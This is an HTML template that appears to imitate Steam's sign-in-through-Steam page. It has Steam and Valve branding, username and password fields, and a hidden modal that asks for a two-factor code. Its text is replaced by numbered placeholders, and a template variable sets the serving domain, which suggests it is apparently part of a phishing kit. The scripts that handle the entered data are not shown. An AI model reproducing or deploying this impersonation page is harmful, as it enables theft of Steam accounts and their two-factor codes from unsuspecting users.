<!DOCTYPE html>
<html class="responsive" lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title l="1"></title>
    <link rel="shortcut icon" href="/assets/1/img/favicon.ico" type="image/x-icon">
    <link href="/assets/1/css/1.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/2.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/3.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/4.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/5.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/6.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/7.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/8.css" rel="stylesheet" type="text/css">
    <link href="/assets/1/css/9.css" rel="stylesheet" type="text/css">
    <script type="text/javascript" src="/assets/1/js/1.js"></script>
    <script type="text/javascript" src="/assets/1/js/2.js"></script>
    <script>
        window.$fDomain = "<%- domain %>";
    </script>
    <style>
        .valve_links {
            margin: 15px 0 0 0;
            display: block;
        }
    </style>
    <script type="text/javascript" src="/assets/1/js/3.js"></script>
</head>
<body class="responsive_page">
<div class="responsive_page_frame with_header">
    <div class="responsive_local_menu_tab"></div>
    <div class="responsive_page_menu_ctn localmenu">
        <div class="responsive_page_menu" id="responsive_page_local_menu">
            <div class="localmenu_content"></div>
        </div>
    </div>
    <div class="responsive_header">
        <div class="responsive_header_content">
            <div id="responsive_menu_logo">
                <img src="/assets/1/img/header_menu_hamburger.png" height="100%">
            </div>
            <div class="responsive_header_logo">
                <img src="/assets/1/img/header_logo.png" height="36" border="0" alt="STEAM">
            </div>
        </div>
    </div>
    <div class="responsive_page_content_overlay"></div>
    <div class="responsive_fixonscroll_ctn nonresponsive_hidden"></div>
    <div class="responsive_page_content">
        <div id="global_header">
            <div class="content">
                <div class="logo">
                    <span id="logo_holder">
                        <a>
                            <img src="/assets/1/img/globalheader_logo.png" width="176" height="44">
                        </a>
                    </span>
                </div>
                <div class="supernav_container">
                    <a class="menuitem" l="2"></a>
                    <a class="menuitem" l="3" style="display: block"></a>
                    <a class="menuitem" l="4"></a>
                    <a class="menuitem" l="5"></a>
                </div>
                <div id="global_actions">
                    <div id="global_action_menu">
                        <div class="header_installsteam_btn header_installsteam_btn_green">
                            <a class="header_installsteam_btn_content" l="6"></a>
                        </div>
                        <a class="global_action_link" l="7"></a> &nbsp;|&nbsp;
                        <span class="pulldown global_action_link" id="language_pulldown" onclick="$('#language_dropdown').toggle()" l="8"></span>
                        <div class="popup_block_new" id="language_dropdown" style="display: none;">
                            <div class="popup_body popup_menu" l="21"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="mainBody">
            <div class="OpenID_MainHeader">
                <div class="logo">
                    <img src="/assets/1/img/sits_landing.png" width="114" height="43" border="0">
                </div>
                <h1 l="9"></h1>
                <div>
                    <div style="float:left; padding: 6px 6px 20px 18px">
                        <img src="/assets/1/img/icon_info.png" width="26" height="26" border="0">
                    </div>
                    <h2 l="10"></h2>
                </div>
            </div>
            <div class="OpenID_LowerContents">
                <div class="OpenIDCol right">
                    <div class="OpenID_LowerContents_right">
                        <h2 l="11"></h2>
                        <ul class="OpenID_list">
                            <li class="OpenID_listitem" l="12"></li>
                            <li class="OpenID_listitem" l="13"></li>
                            <li class="OpenID_listitem" l="14"></li>
                        </ul>
                        <h2 l="15"></h2>
                    </div>
                </div>
                <div class="OpenIDCol left">
                    <div class="OpenID_LowerContents_left">
                        <div id="error_display" style="display: none;"></div>
                        <br>
                        <div l="16"></div>
                        <input class="textField" type="text" name="username" id="steamAccountName" autofocus="" maxlength="64"><br>
                        &nbsp; <br>
                        <div l="17"></div>
                        <input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64"><br>
                        <br>
                        <div id="login_btn_signin">
                            <input class="btn_green_white_innerfade" type="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" value="Sign In">
                        </div>
                        <br>
                        <div id="login_btn_wait" style="display: none;">
                            <img src="/assets/1/img/throbber.gif">
                        </div>
                        <br clear="all">
                        <br>
                        <p l="18"></p>
                    </div>
                </div>
                <div style="clear: both"></div>
            </div>
        </div>
    </div>
    <div id="footer_spacer"></div>
    <div id="footer_responsive_optin_spacer"></div>
    <div id="footer">
        <div class="footer_content">
            <span id="footerLogo">
                <img src="/assets/1/img/footerLogo_valve.png" width="96" height="26" border="0" alt="Valve Logo">
            </span>
            <span id="footerText" l="19"></span>
        </div>
    </div>
</div>
<div class="newmodal_background" style="opacity: 0.8; display: none;"></div>
<div class="newmodal" id="auth" style="display: none;position: fixed; z-index: 1000; max-width: 400px; left: 50%; top: 50%; transform: translate(-50%, -50%)">
    <div class="modal_top_bar"></div>
    <div class="newmodal_header_border">
        <div class="newmodal_header">
            <div class="newmodal_close"></div>
            <div class="title_text" l="22"></div>
        </div>
    </div>
    <div class="newmodal_content_border">
        <div class="newmodal_content" style="max-height: 849px;">
            <div>
                <div class="login_modal loginTwoFactorCodeModal" style="">
                    <div class="twofactorauth_message_area">
                        <div id="login_twofactorauth_icon" class="auth_icon auth_icon_phone"></div>
                        <div class="twofactorauth_messages" id="login_twofactorauth_messages">
                            <div class="twofactorauth_message" id="login_twofactorauth_message_entercode" l="23"></div>

                            <div class="twofactorauth_message" id="login_twofactorauth_message_incorrectcode" style="display: none;" l="24"></div>

                            <div class="twofactorauth_message" id="login_sms_message_selfhelp" style="display: none;" l="25"></div>
                        </div>
                    </div>
                    <div id="login_twofactorauth_details_messages" class="twofactorauth_details_messages">
                        <div class="twofactorauth_details" id="login_twofactorauth_details_entercode" style="" l="26"></div>
                    </div>
                    <div class="twofactorauthcode_entry_area">
                        <div id="login_twofactor_authcode_entry">
                            <div class="twofactorauthcode_entry_box">
                                <input class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off">
                            </div>
                        </div>
                    </div>

                    <div class="modal_buttons" id="login_twofactorauth_buttonsets">
                        <div class="auth_buttonset" id="login_twofactorauth_buttonset_entercode" style="" l="27"></div>
                        <div class="auth_buttonset" id="login_twofactorauth_buttonset_incorrectcode" style="display: none;" l="28"></div>
                        <div class="auth_buttonset" id="login_sms_buttonset_entercode" style="display: none" l="29"></div>
                        <div class="auth_buttonset" id="login_sms_buttonset_incorrectcode" style="display: none;" l="30"></div>
                        <div class="auth_buttonset" id="login_twofactorauth_buttonset_waiting" style="display: none;"></div>
                    </div>
                    <div style="display: none;">
                        <input type="submit">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="newmodal" id="lang" style="display: none;position: fixed; z-index: 1000; max-width: 1823px; left: 50%; top: 50%; transform: translate(-50%, -50%)">
    <div class="modal_top_bar"></div>
    <div class="newmodal_header_border">
        <div class="newmodal_header">
            <div class="newmodal_close" style="display: none;"></div>
            <div class="title_text" l="36"></div>
        </div>
    </div>
    <div class="newmodal_content_border">
        <div class="newmodal_content" style="max-height: 849px;">
            <div>
                <div class="waiting_dialog_container">
                    <div class="waiting_dialog_throbber"></div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="newmodal" id="error" style="display: none;position: fixed; z-index: 1000; max-width: 1823px; left: 50%; top: 50%; transform: translate(-50%, -50%)">
    <div class="modal_top_bar"></div>
    <div class="newmodal_header_border">
        <div class="newmodal_header">
            <div class="newmodal_close" style="display: none;"></div>
            <div class="title_text" l="37"></div>
        </div>
    </div>
    <div class="newmodal_content_border">
        <div class="newmodal_content" style="max-height: 849px;">
            <div>
                <p l="38"></p>
            </div>
            <div class="btn_grey_steamui btn_medium" style="float: right;" id="close_error"><span></span></div>
        </div>
    </div>
</div>
</body>
</html>
